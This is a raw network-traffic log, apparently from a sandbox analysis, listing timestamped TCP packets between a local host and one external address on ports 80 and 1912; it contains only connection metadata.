                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.745968103 CET4971380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.747623920 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.747803926 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.748183966 CET4971380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.749563932 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.749669075 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.749771118 CET4971380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.751480103 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.751606941 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.751652956 CET4971380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.753417015 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.753540993 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.754508972 CET4971380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.755359888 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.755587101 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.755719900 CET4971380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.757297993 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.757401943 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.757462025 CET4971380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.759238005 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.759341002 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.759429932 CET4971380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.761202097 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.761426926 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.761476040 CET4971380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.763103962 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.763223886 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.763278008 CET4971380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.765038013 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.765141964 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.765223026 CET4971380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.766985893 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.767155886 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.767214060 CET4971380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.768996954 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.769036055 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.769783974 CET4971380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.770853043 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.770960093 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.771089077 CET4971380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.772805929 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.772890091 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.772993088 CET4971380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.774707079 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.774970055 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.775015116 CET4971380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.776887894 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.776951075 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.778613091 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.778672934 CET4971380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.778709888 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.778778076 CET4971380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.780517101 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.780621052 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.780927896 CET4971380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.782484055 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.782598972 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.782651901 CET4971380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.784389019 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.784481049 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.784554958 CET4971380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.786346912 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.786454916 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.788278103 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.788351059 CET4971380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.788378000 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.790219069 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.790291071 CET4971380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.790307999 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.790786982 CET4971380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.792150021 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.792232990 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.792351007 CET4971380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.794085026 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.794265985 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.794540882 CET4971380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.796107054 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.796189070 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.796317101 CET4971380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.797965050 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.798068047 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.798114061 CET4971380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.799871922 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.799993992 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.801244020 CET4971380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.801826000 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.801932096 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.802252054 CET4971380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.803745985 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.803848028 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.803900003 CET4971380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.805716038 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.805778027 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.806576014 CET4971380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.807627916 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.807725906 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.807777882 CET4971380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.807815075 CET4971380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.927521944 CET8049713185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:50.978349924 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:51.024575949 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:51.041431904 CET4971580192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:51.079216003 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:51.161309958 CET8049715185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:51.161490917 CET4971580192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:51.166878939 CET4971580192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:51.199214935 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:51.199301958 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:51.199326992 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:51.199337959 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:51.199341059 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:51.199357033 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:51.199373007 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:51.199382067 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:51.199433088 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:51.199465036 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:51.199493885 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:51.199553013 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:51.199579954 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:51.287111998 CET8049715185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:51.287192106 CET4971580192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:51.319274902 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:51.319335938 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:51.319408894 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:51.319439888 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:51.407205105 CET8049715185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:51.639408112 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:51.680845022 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:51.738039970 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:51.857999086 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:52.172095060 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:52.178919077 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:52.298904896 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:52.611926079 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:52.641510963 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:52.761413097 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:52.789330959 CET8049715185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:52.789355993 CET8049715185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:52.789421082 CET4971580192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:52.791297913 CET4971580192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:52.906533003 CET4971780192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:52.911081076 CET8049715185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:53.026532888 CET8049717185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:53.026616096 CET4971780192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:53.026787043 CET4971780192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:53.074348927 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:53.079449892 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:53.146620035 CET8049717185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:53.146687984 CET4971780192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:53.200166941 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:53.200181961 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:53.200195074 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:53.200279951 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:53.200292110 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:53.200340033 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:53.200351000 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:53.200360060 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:53.266488075 CET8049717185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:53.543436050 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:53.587066889 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:53.662671089 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:53.782859087 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:53.782876015 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:53.782896042 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:53.782907009 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:53.782916069 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:53.782924891 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:53.782934904 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:53.782967091 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:53.782979965 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:53.782982111 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:53.782989979 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:53.783014059 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:53.783026934 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:53.783031940 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:53.783054113 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:53.783076048 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:53.783085108 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:53.783092976 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:53.783122063 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:53.783129930 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:53.783163071 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:53.783173084 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:53.783237934 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:53.783248901 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:53.783287048 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:53.783288002 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:53.783296108 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:53.783329010 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:53.783340931 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:53.783396959 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:53.783446074 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:53.783469915 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:53.783478975 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:53.783514977 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:53.783528090 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:53.783540964 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:53.783572912 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:53.783586979 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:53.783612013 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:53.783652067 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:53.783693075 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:53.783700943 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:53.783731937 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:53.783755064 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:53.783762932 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:53.783790112 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:53.783802986 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:53.783834934 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:53.783835888 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:53.783875942 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:53.783881903 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:53.783920050 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:53.902801991 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:53.902820110 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:53.902829885 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:53.902851105 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:53.902859926 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:53.902870893 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:53.902892113 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:53.902901888 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:53.902925014 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:53.902939081 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:53.902945995 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:53.902976036 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:53.903121948 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:53.903131962 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:53.903141975 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:53.903156996 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:53.903229952 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:53.903239965 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:53.903326035 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:53.903337002 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:53.903362989 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:53.903372049 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:53.903448105 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:53.903465986 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:53.903556108 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:53.903573036 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:53.903695107 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:53.903703928 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:53.903704882 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:53.903759003 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:53.903779030 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:53.903815985 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:53.903821945 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:53.903825998 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:53.903844118 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:53.903865099 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:53.903877974 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:53.903887987 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:53.903898954 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:53.903924942 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:53.903935909 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:53.903943062 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:53.903961897 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:53.903976917 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:53.903981924 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:53.904016018 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:53.904051065 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:53.904062986 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:53.904140949 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:53.904150009 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:53.904231071 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:53.904241085 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:53.904290915 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:53.904301882 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:53.904371023 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:53.904381037 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:53.904392004 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:53.904402018 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:53.904516935 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:53.904526949 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:53.904537916 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:53.904556036 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:53.904565096 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:53.904619932 CET191249710185.81.68.147192.168.2.8
